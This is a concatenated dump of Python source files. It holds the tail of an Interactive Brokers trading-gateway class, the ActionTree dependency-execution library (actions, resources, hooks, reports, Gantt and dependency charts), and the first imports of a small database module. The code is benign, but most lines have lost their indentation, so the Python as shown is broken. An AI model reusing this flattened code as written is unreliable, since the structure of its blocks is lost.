        order = self.orders.get(orderid, None)
        if not order:
            return
        order.status = STATUS_IB2VT[status]
order.traded = filled
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super(IbApi, self).openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=ib_contract.conId,
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, ib_contract.exchange),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
price=ib_order.lmtPrice,
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super(IbApi, self).updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super(IbApi, self).updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
ib_size = contract.multiplier
if not ib_size:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super(IbApi, self).updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super(IbApi, self).contractDetails(reqId, contractDetails)
ib_symbol = contractDetails.contract.conId
ib_exchange = contractDetails.contract.exchange
ib_size = contractDetails.contract.multiplier
ib_product = contractDetails.contract.secType
if not ib_size:
ib_size = 1
contract = ContractData(
symbol=ib_symbol,
exchange=EXCHANGE_IB2VT.get(ib_exchange, ib_exchange),
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_product],
size=ib_size,
pricetick=contractDetails.minTick,
net_position=True,
gateway_name=self.gateway_name,
)
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super(IbApi, self).execDetails(reqId, contract, execution)
# today_date = datetime.now().strftime("%Y%m%d")
trade = TradeData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
time=datetime.strptime(execution.time, "%Y%m%d %H:%M:%S"),
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str): # pylint: disable=invalid-name
"""
        Callback of all managed sub-account ids.
"""
super(IbApi, self).managedAccounts(accountsList)
for account_code in accountsList.split(","):
self.client.reqAccountUpdates(True, account_code)
def connect(self, host: str, port: int, clientid: int):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
        Disconnect from TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.lmtPrice = req.price
ib_order.totalQuantity = req.volume
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
|
__init__.py
|
# coding: utf8
# Copyright 2013-2017 Vincent Jacques <vincent@vincent-jacques.net>
from __future__ import division, absolute_import, print_function
import ctypes
import datetime
import multiprocessing
import os.path
import pickle
import sys
import threading
# We import matplotlib in the functions that need it because
# upgrading it while using it leads to segfault. And we upgrade
# it via devlpr, that uses ActionTree.
import graphviz
libc = ctypes.CDLL(None)
try:
stdout = ctypes.c_void_p.in_dll(libc, "stdout")
except ValueError: # Not unittested: Not doctested: specific to macOS
stdout = ctypes.c_void_p.in_dll(libc, "__stdoutp")
try:
stderr = ctypes.c_void_p.in_dll(libc, "stderr")
except ValueError: # Not unittested: Not doctested: specific to macOS
stderr = ctypes.c_void_p.in_dll(libc, "__stderrp")
def execute(action, cpu_cores=None, keep_going=False, do_raise=True, hooks=None):
"""
Recursively execute an :class:`.Action`'s dependencies then the action.
:param Action action: the action to execute.
:param cpu_cores: number of CPU cores to use in parallel.
Pass ``None`` (the default value) to let ActionTree choose.
Pass :attr:`UNLIMITED` to execute an unlimited number of actions in parallel
(make sure your system has the necessary resources).
Note: CPU cores are managed like any other :class:`Resource`, and this parameter sets the availability
of :obj:`CPU_CORE` for this execution.
:type cpu_cores: int or None or UNLIMITED
:param bool keep_going: if ``True``, then execution does not stop on first failure,
but executes as many dependencies as possible.
:param bool do_raise: if ``False``, then exceptions are not re-raised as :exc:`CompoundException`
but only included in the :class:`.ExecutionReport`.
:param Hooks hooks: its methods will be called when execution progresses.
:raises CompoundException: when ``do_raise`` is ``True`` and dependencies raise exceptions.
:rtype: ExecutionReport
"""
if cpu_cores is None:
cpu_cores = multiprocessing.cpu_count()
if hooks is None:
hooks = Hooks()
return _Execute(cpu_cores, keep_going, do_raise, hooks).run(action)
UNLIMITED = object()
"""The availability of an infinite :class:`Resource`."""
class Action(object):
"""
The main class of ActionTree.
An action to be started after all its dependencies are finished.
Pass it to :func:`.execute`.
This is a base class for your custom actions.
You must define a ``do_execute(self, dependency_statuses)`` method that performs the action.
The ``dependency_statuses`` argument is a dictionary whose keys are ``self.dependencies`` and values are their
:class:`.ActionStatus`.
:ref:`outputs` describes how its return values, the exceptions it may raise and what it may print are handled.
Actions, return values and exceptions raised must be picklable.
"""
def __init__(self, label, dependencies=[], resources_required={}, accept_failed_dependencies=False):
"""
:param label: A string used to represent the action in :class:`GanttChart` and
:class:`DependencyGraph`. Can be retrieved by :attr:`label`.
:type label: str or None
:param list(Action) dependencies:
see :meth:`~.Action.add_dependency`
:param resources_required:
see :meth:`~.Action.require_resource`
:type resources_required: dict(Resource, int)
:param bool accept_failed_dependencies:
if ``True``, then the action will execute even after some of its dependencies failed.
"""
self.__label = label
self.__dependencies = list(dependencies)
self.__resources_required = {CPU_CORE: 1}
self.__resources_required.update(resources_required)
self.__accept_failed_dependencies = accept_failed_dependencies
@property
def label(self):
"""
The label passed to the constructor.
"""
return self.__label
def add_dependency(self, dependency):
"""
Add a dependency to be executed before this action.
Order of insertion of dependencies is not important.
:param Action dependency:
:raises DependencyCycleException: when adding the new dependency would create a cycle.
"""
if self in dependency.get_possible_execution_order(): # Not doctested: implementation detail
raise DependencyCycleException()
self.__dependencies.append(dependency)
@property
def dependencies(self):
"""
The list of this action's direct dependencies.
"""
return list(self.__dependencies)
def require_resource(self, resource, quantity=1):
"""
Set the quantity of a certain :class:`.Resource` required to run this action.
Note that an action that requires more than a resource's availability *will* be executed anyway.
It will just not be executed in parallel with any other action that requires the same resource.
:param Resource resource:
:param int quantity:
"""
self.__resources_required[resource] = quantity
@property
def resources_required(self):
"""
The list of this action's required resources and quantities required.
:rtype: list(tuple(Resource, int))
"""
return list(self.__resources_required.iteritems())
@property
def accept_failed_dependencies(self):
"""
``True`` if the action will execute even if some of its dependencies failed.
:rtype: bool
"""
return self.__accept_failed_dependencies
def get_possible_execution_order(self, seen_actions=None):
"""
Return the list of all this action's dependencies (recursively),
in an order that is suitable for linear execution.
Note that this order is not unique.
The order chosen is not specified.
"""
if seen_actions is None:
seen_actions = set()
actions = []
if self not in seen_actions:
seen_actions.add(self)
for dependency in self.__dependencies:
actions += dependency.get_possible_execution_order(seen_actions)
actions.append(self)
return actions
# @todo Add a notion of ActionSet
# ActionSet.add_dependency would add the dep to its leaves
# Action.add_dependency would accept an ActionSet
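# A minimal, hedged usage sketch of the API above. The labels are illustrative;
# the subclass lives at module level because actions must be picklable.
class _ExampleEchoAction(Action):
    def do_execute(self, dependency_statuses):
        print(self.label)
        return self.label

def _example_execute():
    compile_a = _ExampleEchoAction("compile a")
    compile_b = _ExampleEchoAction("compile b")
    link = _ExampleEchoAction("link", dependencies=[compile_a, compile_b])
    report = execute(link, cpu_cores=2)  # compile_a and compile_b may run in parallel, then link
    return report.is_success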
class Resource(object):
"""
A resource that an :class:`Action` can require for its execution.
You can use resources to protect stuff that must not be used by more than N actions at the same time,
à la `semaphore <https://en.wikipedia.org/wiki/Semaphore_(programming)>`_.
Like semaphores, with an availability of 1,
they become `mutexes <https://en.wikipedia.org/wiki/Lock_(computer_science)>`_.
:ref:`resources` describes how to use this class.
"""
def __init__(self, availability):
"""
:param availability: the number of instances available for this resource
:type availability: int or UNLIMITED
"""
self.__availability = availability
def _availability(self, cpu_cores):
return self.__availability
class CpuCoreResource(Resource):
def _availability(self, cpu_cores):
return cpu_cores
CPU_CORE = CpuCoreResource(0)
"""
A special :class:`.Resource` representing a processing unit.
You can pass it to :meth:`.Action.require_resource` if your action will execute on more than one core.
:type: Resource
"""
class Hooks(object):
"""
Base class to derive from when defining your hooks.
:func:`.execute` will call its methods when execution progresses.
"""
def action_pending(self, time, action):
"""
Called when an action is considered for execution, i.e. at the beginning of :func:`.execute`.
:param datetime.datetime time: the time at which the action was considered for execution.
:param Action action: the action.
"""
def action_ready(self, time, action):
"""
Called when an action is ready to be executed, i.e. when all its dependencies have succeeded.
:param datetime.datetime time: the time at which the action was ready.
:param Action action: the action.
"""
def action_canceled(self, time, action):
"""
Called when an action's execution is canceled, i.e. when one of its dependencies has failed.
:param datetime.datetime time: the time at which the action was canceled.
:param Action action: the action.
"""
def action_started(self, time, action):
"""
Called when an action's execution starts.
:param datetime.datetime time: the time at which the action was started.
:param Action action: the action.
"""
def action_printed(self, time, action, data):
"""
Called when an action prints something.
:param datetime.datetime time: the time at which the action printed the data.
:param Action action: the action.
:param str data: the data printed.
"""
def action_successful(self, time, action, return_value):
"""
Called when an action completes without error.
:param datetime.datetime time: the time at which the action completed.
:param Action action: the action.
:param return_value: the value returned by the action.
"""
def action_failed(self, time, action, exception):
"""
Called when an action completes with an exception.
:param datetime.datetime time: the time at which the action completed.
:param Action action: the action.
:param exception: the exception raised by the action
"""
class DependencyCycleException(Exception): # Not doctested: implementation detail
"""
Exception thrown by :meth:`.Action.add_dependency` when adding the new dependency would create a cycle.
"""
def __init__(self):
super(DependencyCycleException, self).__init__("Dependency cycle")
class CompoundException(Exception): # Not doctested: @todoc
"""
Exception thrown by :func:`.execute` when dependencies raise exceptions.
"""
def __init__(self, exceptions, execution_report):
super(CompoundException, self).__init__(exceptions)
self.__exceptions = exceptions
self.__execution_report = execution_report
@property
def exceptions(self):
"""
The list of exceptions raised.
"""
return self.__exceptions
@property
def execution_report(self):
"""
The :class:`.ExecutionReport` of the failed execution.
"""
return self.__execution_report
class ExecutionReport(object):
"""
ExecutionReport()
Execution report, returned by :func:`.execute`.
"""
class ActionStatus(object):
"""
Status of a single :class:`.Action`.
"""
def __init__(self, pending_time):
self.__pending_time = pending_time
self.__ready_time = None
self.__cancel_time = None
self.__start_time = None
self.__success_time = None
self.__return_value = None
self.__failure_time = None
self.__exception = None
self.__output = None
def _set_ready_time(self, ready_time):
self.__ready_time = ready_time
def _set_cancel_time(self, cancel_time):
self.__cancel_time = cancel_time
def _set_start_time(self, start_time):
self.__start_time = start_time
def _set_success(self, success_time, return_value):
self.__success_time = success_time
self.__return_value = return_value
self._add_output(b"")
def _set_failure(self, failure_time, exception):
self.__failure_time = failure_time
self.__exception = exception
self._add_output(b"")
def _add_output(self, output):
self.__output = (self.__output or b"") + output
@property
def status(self):
"""
The status of the action:
:attr:`SUCCESSFUL` if the action succeeded,
:attr:`FAILED` if the action failed,
and :attr:`CANCELED` if the action was canceled because some of its dependencies failed.
"""
if self.start_time:
if self.success_time:
return SUCCESSFUL
else:
assert self.failure_time
return FAILED
else:
assert self.cancel_time
return CANCELED
@property
def pending_time(self):
"""
The time when this action was considered for execution.
:rtype: datetime.datetime
"""
return self.__pending_time # Not doctested: @todoc
@property
def ready_time(self):
"""
The time when this action was ready to execute.
(``None`` if it was canceled before being ready).
:rtype: datetime.datetime or None
"""
return self.__ready_time
@property
def cancel_time(self):
"""
The time when this action was canceled.
(``None`` if it was started).
:rtype: datetime.datetime or None
"""
return self.__cancel_time
@property
def start_time(self):
"""
The time at the beginning of the execution of this action.
(``None`` if it was never started).
:rtype: datetime.datetime or None
"""
return self.__start_time
@property
def success_time(self):
"""
The time at the successful end of the execution of this action.
(``None`` if it was never started or if it failed).
:rtype: datetime.datetime or None
"""
return self.__success_time
@property
def return_value(self):
"""
The value returned by this action
(``None`` if it failed or was never started).
"""
return self.__return_value # Not doctested: @todoc
@property
def failure_time(self):
"""
The time at the failed end of the execution of this action.
(``None`` if it was never started or if it succeeded).
:rtype: datetime.datetime or None
"""
return self.__failure_time
@property
def exception(self):
"""
The exception raised by this action
(``None`` if it succeeded or was never started).
"""
return self.__exception # Not doctested: @todoc
@property
def output(self):
"""
Everything printed (and flushed in time) by this action.
(``None`` if it never started, ``""`` if it didn't print anything)
:rtype: str or None
"""
return self.__output # Not doctested: @todoc
def __init__(self, root_action, actions, now):
self._root_action = root_action
self.__action_statuses = {action: self.ActionStatus(now) for action in actions}
@property
def is_success(self):
"""
``True`` if the execution finished without error.
:rtype: bool
"""
return all(
action_status.status == SUCCESSFUL
for action_status in self.__action_statuses.itervalues()
)
def get_action_status(self, action):
"""
Get the :class:`ActionStatus` of an action.
:param Action action:
:rtype: ActionStatus
"""
return self.__action_statuses[action]
def get_actions_and_statuses(self):
"""
Get a list of actions and their statuses.
:rtype: list(tuple(Action, ActionStatus))
"""
return self.__action_statuses.items()
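# A hedged sketch of reading an ExecutionReport: `report` is assumed to come
# from a previous call to execute() and `action` to be one of its actions.
def _example_inspect_report(report, action):
    action_status = report.get_action_status(action)
    if action_status.status == SUCCESSFUL:
        return action_status.return_value, action_status.output
    elif action_status.status == FAILED:
        return action_status.exception, action_status.output
    else:  # CANCELED: never started because one of its dependencies failed
        return None, None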
SUCCESSFUL = "SUCCESSFUL"
"The :attr:`.ActionStatus.status` after a successful execution."
FAILED = "FAILED"
"The :attr:`.ActionStatus.status` after a failed execution where this action raised an exception."
CANCELED = "CANCELED"
"The :attr:`.ActionStatus.status` after a failed execution where a dependency raised an exception."
PRINTED = "PRINTED"
PICKLING_EXCEPTION = "PICKLING_EXCEPTION"
class DependencyGraph(object):
"""
A visual representation of the dependency graph, using `Graphviz <http://graphviz.org/>`__.
"""
def __init__(self, action):
self.__graphviz_graph = graphviz.Digraph("action", node_attr={"shape": "box"})
nodes = {}
for (i, action) in enumerate(action.get_possible_execution_order()):
node = str(i)
nodes[action] = node
if action.label is None: # Not doctested: implementation detail
self.__graphviz_graph.node(node, shape="point")
else:
self.__graphviz_graph.node(node, action.label)
for dependency in action.dependencies:
assert dependency in nodes # Because we are iterating a possible execution order
self.__graphviz_graph.edge(node, nodes[dependency])
def write_to_png(self, filename): # Not unittested: too difficult
"""
Write the graph as a PNG image to the specified file.
See also :meth:`get_graphviz_graph` if you want to draw the graph somewhere else.
"""
directory = os.path.dirname(filename)
filename = os.path.basename(filename)
filename, ext = os.path.splitext(filename)
g = self.get_graphviz_graph()
g.format = "png"
g.render(directory=directory, filename=filename, cleanup=True)
def get_graphviz_graph(self):
"""
Return a :class:`graphviz.Digraph` of this dependency graph.
See also :meth:`write_to_png` for the simplest use-case.
"""
return self.__graphviz_graph.copy()
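# A hedged sketch: rendering the dependency graph of an action tree built with
# the classes above. The output filename is an arbitrary example.
def _example_dependency_graph(root_action):
    graph = DependencyGraph(root_action)
    graph.write_to_png("dependencies.png")  # simplest use-case
    return graph.get_graphviz_graph()       # or draw it yourself with graphviz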
class GanttChart(object): # Not unittested: too difficult
"""
A visual representation of the timing of an execution.
"""
def __init__(self, report):
self.__actions = {
id(action): self.__make_action(action, status)
for (action, status) in report.get_actions_and_statuses()
}
self.__ordinates = {}
dependents = {}
for (action, _) in report.get_actions_and_statuses():
dependents.setdefault(action, set())
for dependency in action.dependencies:
dependents.setdefault(dependency, set()).add(action)
def compute(action, ordinate):
self.__ordinates[id(action)] = len(self.__actions) - ordinate
for d in sorted(
action.dependencies,
key=(
lambda d: report.get_action_status(d).success_time or
report.get_action_status(d).failure_time or
report.get_action_status(d).cancel_time or
report.get_action_status(d).ready_time or
report.get_action_status(d).pending_time
)
):
if len(dependents[d]) == 1:
ordinate = compute(d, ordinate - 1)
else:
dependents[d].remove(action)
return ordinate
last_ordinate = compute(report._root_action, len(self.__actions) - 1)
assert last_ordinate == 0, last_ordinate
class SuccessfulAction(object):
def __init__(self, action, status):
self.__label = action.label
self.__id = id(action)
self.__dependencies = set(id(d) for d in action.dependencies)
self.__ready_time = status.ready_time
self.__start_time = status.start_time
self.__success_time = status.success_time
@property
def min_time(self):
return self.__ready_time
@property
def max_time(self):
return self.__success_time
def draw(self, ax, ordinates, actions):
ordinate = ordinates[self.__id]
ax.plot([self.__ready_time, self.__start_time], [ordinate, ordinate], color="blue", lw=1)
ax.plot(
[self.__start_time, self.__success_time], [ordinate, ordinate],
color="blue", lw=4, solid_capstyle="butt",
)
# @todo Make sure the text is not outside the plot on the right
if self.__label is not None:
ax.annotate(
self.__label,
xy=(self.__start_time, ordinate), xytext=(0, 3), textcoords="offset points",
)
for d in self.__dependencies:
ax.plot([actions[d].max_time, self.min_time], [ordinates[d], ordinate], "k:", lw=1)
class FailedAction(object):
def __init__(self, action, status):
self.__label = action.label
self.__id = id(action)
self.__dependencies = set(id(d) for d in action.dependencies)
self.__ready_time = status.ready_time
self.__start_time = status.start_time
self.__failure_time = status.failure_time
@property
def min_time(self):
return self.__ready_time
@property
def max_time(self):
return self.__failure_time
def draw(self, ax, ordinates, actions):
ordinate = ordinates[self.__id]
ax.plot([self.__ready_time, self.__start_time], [ordinate, ordinate], color="red", lw=1)
ax.plot(
[self.__start_time, self.__failure_time], [ordinate, ordinate],
color="red", lw=4, solid_capstyle="butt",
)
if self.__label is not None:
ax.annotate(
self.__label,
xy=(self.__start_time, ordinate), xytext=(0, 3), textcoords="offset points",
)
for d in self.__dependencies:
ax.plot([actions[d].max_time, self.min_time], [ordinates[d], ordinate], "k:", lw=1)
class CanceledAction(object):
def __init__(self, action, status):
self.__label = action.label
self.__id = id(action)
self.__dependencies = set(id(d) for d in action.dependencies)
self.__ready_time = status.ready_time
self.__cancel_time = status.cancel_time
@property
def min_time(self):
return self.__cancel_time if self.__ready_time is None else self.__ready_time
@property
def max_time(self):
return self.__cancel_time
def draw(self, ax, ordinates, actions):
ordinate = ordinates[self.__id]
if self.__ready_time: # Not doctested: implementation detail
ax.plot([self.__ready_time, self.__cancel_time], [ordinate, ordinate], color="grey", lw=1)
if self.__label is not None:
ax.annotate(
self.__label,
xy=(self.__cancel_time, ordinate), xytext=(0, 3), textcoords="offset points",
color="grey",
)
for d in self.__dependencies:
ax.plot([actions[d].max_time, self.min_time], [ordinates[d], ordinate], "k:", lw=1)
@classmethod
def __make_action(cls, action, status):
if status.status == SUCCESSFUL:
return cls.SuccessfulAction(action, status)
elif status.status == FAILED:
return cls.FailedAction(action, status)
elif status.status == CANCELED:
return cls.CanceledAction(action, status)
def write_to_png(self, filename):
"""
Write the Gantt chart as a PNG image to the specified file.
See also :meth:`get_mpl_figure` and :meth:`plot_on_mpl_axes` if you want to draw the report somewhere else.
"""
import matplotlib.backends.backend_agg
figure = self.get_mpl_figure()
canvas = matplotlib.backends.backend_agg.FigureCanvasAgg(figure)
canvas.print_figure(filename)
def get_mpl_figure(self):
"""
Return a :class:`matplotlib.figure.Figure` of this Gantt chart.
See also :meth:`plot_on_mpl_axes` if you want to draw the Gantt chart on your own matplotlib figure.
See also :meth:`write_to_png` for the simplest use-case.
"""
import matplotlib.figure
fig = matplotlib.figure.Figure()
ax = fig.add_subplot(1, 1, 1)
self.plot_on_mpl_axes(ax)
return fig
@staticmethod
def __nearest(v, values): # Not doctested: implementation detail
for i, value in enumerate(values):
if v < value:
break
if i == 0:
return values[0]
else:
if v - values[i - 1] <= values[i] - v:
return values[i - 1]
else:
return values[i]
__intervals = [
1, 2, 5, 10, 15, 30, 60,
2 * 60, 10 * 60, 30 * 60, 3600,
2 * 3600, 3 * 3600, 6 * 3600, 12 * 3600, 24 * 3600,
]
def plot_on_mpl_axes(self, ax):
"""
Plot this Gantt chart on the provided :class:`matplotlib.axes.Axes`.
See also :meth:`write_to_png` and :meth:`get_mpl_figure` for the simpler use-cases.
"""
import matplotlib.dates
for action in self.__actions.itervalues():
action.draw(ax, self.__ordinates, self.__actions)
ax.get_yaxis().set_ticklabels([])
ax.set_ylim(0.5, len(self.__actions) + 1)
min_time = min(a.min_time for a in self.__actions.itervalues()).replace(microsecond=0)
max_time = (
max(a.max_time for a in self.__actions.itervalues()).replace(microsecond=0) +
datetime.timedelta(seconds=1)
)
duration = int((max_time - min_time).total_seconds())
ax.set_xlabel("Local time")
ax.set_xlim(min_time, max_time)
ax.xaxis_date()
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S"))
ax.xaxis.set_major_locator(matplotlib.dates.AutoDateLocator(maxticks=4, minticks=5))
ax2 = ax.twiny()
ax2.set_xlabel("Relative time")
ax2.set_xlim(min_time, max_time)
ticks = range(0, duration, self.__nearest(duration // 5, self.__intervals))
ax2.xaxis.set_ticks([min_time + datetime.timedelta(seconds=s) for s in ticks])
ax2.xaxis.set_ticklabels(ticks)
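# A hedged sketch: drawing the Gantt chart of an ExecutionReport (e.g. the one
# returned by execute()). The output filename is an arbitrary example.
def _example_gantt_chart(report):
    chart = GanttChart(report)
    chart.write_to_png("execution.png")  # simplest use-case
    return chart.get_mpl_figure()        # or embed the matplotlib figure elsewhere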
class _Execute(object):
def __init__(self, cpu_cores, keep_going, do_raise, hooks):
self.cpu_cores = cpu_cores
self.keep_going = keep_going
self.do_raise = do_raise
self.hooks = hooks
def run(self, root_action):
now = datetime.datetime.now()
# Pre-process actions
self._check_picklability(root_action)
actions = root_action.get_possible_execution_order()
self.actions_by_id = {id(action): action for action in actions}
self.dependents = {action: set() for action in actions}
for action in actions:
for dependency in action.dependencies:
self.dependents[dependency].add(action)
# Misc stuff
self.report = ExecutionReport(root_action, actions, now)
for action in actions:
self.hooks.action_pending(now, action)
self.events = multiprocessing.Queue()
self.exceptions = []
self.resources_used = {}
# Actions by status
self.pending = set(actions)
self.ready = set()
self.running = set()
self.done = set()
for action in actions:
if not action.dependencies:
self._prepare_action(action, now)
# Execute
while self.pending or self.ready or self.running:
self._progress(now)
now = datetime.datetime.now()
for w in multiprocessing.active_children():
w.join()
if self.do_raise and self.exceptions: # Not doctested: @todoc
raise CompoundException(self.exceptions, self.report)
else:
return self.report
def _cancel_action(self, action, now):
self.report.get_action_status(action)._set_cancel_time(now)
self.hooks.action_canceled(now, action)
if action in self.pending:
self._change_status(action, self.pending, self.done)
else: # Not doctested: implementation detail
self._change_status(action, self.ready, self.done)
if not self.keep_going: # Not doctested: implementation detail
for d in action.dependencies:
if d in self.pending or d in self.ready:
self._cancel_action(d, now)
self._triage_pending_dependents(action, True, now)
def _triage_pending_dependents(self, action, failed, now):
for dependent in self.pending & self.dependents[action]:
if failed and not dependent.accept_failed_dependencies:
self._cancel_action(dependent, now)
elif all(d in self.done for d in dependent.dependencies):
self._prepare_action(dependent, now)
def _prepare_action(self, action, now):
self.report.get_action_status(action)._set_ready_time(now)
self.hooks.action_ready(now, action)
self._change_status(action, self.pending, self.ready)
def _progress(self, now):
# @todo Should we tweak the scheduling?
# We could prioritize the actions that use many resources,
# hoping that this would avoid idle CPU cores at the end of the execution.
# Scheduling is a hard problem, we may just want to keep the current, random, behavior.
for action in set(self.ready):
if self._allocate_resources(action):
self._start_action(action, now)
self._handle_next_event()
def _allocate_resources(self, action):
for (resource, quantity) in action.resources_required:
used = self.resources_used.setdefault(resource, 0)
if used == 0:
# Allow actions requiring more than available to run when they are alone requiring this resource
continue
availability = resource._availability(self.cpu_cores)
if availability is UNLIMITED: # Not doctested: implementation detail
# Don't check usage of unlimited resources
continue
if used + quantity > availability:
return False
for (resource, quantity) in action.resources_required:
self.resources_used[resource] += quantity
return True
def _start_action(self, action, now):
self.report.get_action_status(action)._set_start_time(now)
self.hooks.action_started(now, action)
dependency_statuses = {d: self.report.get_action_status(d) for d in action.dependencies}
p = multiprocessing.Process(
target=self._run_action,
kwargs=dict(action=action, action_id=id(action), dependency_statuses=dependency_statuses)
)
p.start()
self._change_status(action, self.ready, self.running)
def _run_action(self, action, action_id, dependency_statuses):
return_value = exception = None
(pipe_r, pipe_w) = os.pipe()
sys.stdout.flush()
libc.fflush(stdout)
os.dup2(pipe_w, 1)
sys.stderr.flush()
libc.fflush(stderr)
os.dup2(pipe_w, 2)
os.close(pipe_w)
thread = threading.Thread(target=self._read_to_events, kwargs=dict(action_id=action_id, pipe_r=pipe_r))
thread.daemon = True
thread.start()
try:
return_value = action.do_execute(dependency_statuses)
except BaseException as e:
exception = e
sys.stdout.flush()
libc.fflush(stdout)
os.close(1)
sys.stderr.flush()
libc.fflush(stderr)
os.close(2)
thread.join()
os.close(pipe_r)
try:
self._check_picklability((exception, return_value))
except: # Not doctested: mandatory picklability is more an issue than a feature
self.events.put((PICKLING_EXCEPTION, action_id, ()))
else:
end_time = datetime.datetime.now()
if exception:
self.events.put((FAILED, action_id, (end_time, exception)))
else:
self.events.put((SUCCESSFUL, action_id, (end_time, return_value)))
def _read_to_events(self, action_id, pipe_r):
while True:
data = os.read(pipe_r, 1024)
if len(data) == 0:
break
self.events.put((PRINTED, action_id, (datetime.datetime.now(), data)))
def _check_picklability(self, stuff):
# This is a way to fail fast if we see a non-picklable object
# because ProcessPoolExecutor freezes forever if we try to transfer
# a non-picklable object through its queues
pickle.loads(pickle.dumps(stuff))
def _handle_next_event(self):
(event_kind, action_id, event_payload) = self.events.get()
handlers = {
SUCCESSFUL: self._handle_successful_event,
PRINTED: self._handle_printed_event,
FAILED: self._handle_failed_event,
PICKLING_EXCEPTION: self._handle_pickling_exception_event,
}
handlers[event_kind](self.actions_by_id[action_id], *event_payload)
def _handle_successful_event(self, action, success_time, return_value):
self.report.get_action_status(action)._set_success(success_time, return_value)
self.hooks.action_successful(success_time, action, return_value)
self._change_status(action, self.running, self.done)
self._triage_pending_dependents(action, False, success_time)
self._deallocate_resources(action)
def _handle_printed_event(self, action, print_time, data):
self.report.get_action_status(action)._add_output(data)
self.hooks.action_printed(print_time, action, data)
def _handle_failed_event(self, action, failure_time, exception):
self.report.get_action_status(action)._set_failure(failure_time, exception)
self.hooks.action_failed(failure_time, action, exception)
self._change_status(action, self.running, self.done)
self.exceptions.append(exception)
self._triage_pending_dependents(action, True, failure_time)
self._deallocate_resources(action)
def _handle_pickling_exception_event(self, action): # Not doctested: mandatory picklability
raise pickle.PicklingError()
def _change_status(self, action, orig, dest):
orig.remove(action)
dest.add(action)
def _deallocate_resources(self, action):
for (resource, quantity) in action.resources_required:
self.resources_used[resource] = max(0, self.resources_used[resource] - quantity)
|
deadsimpledb.py
|
import logging
import csv
import os
import pickle
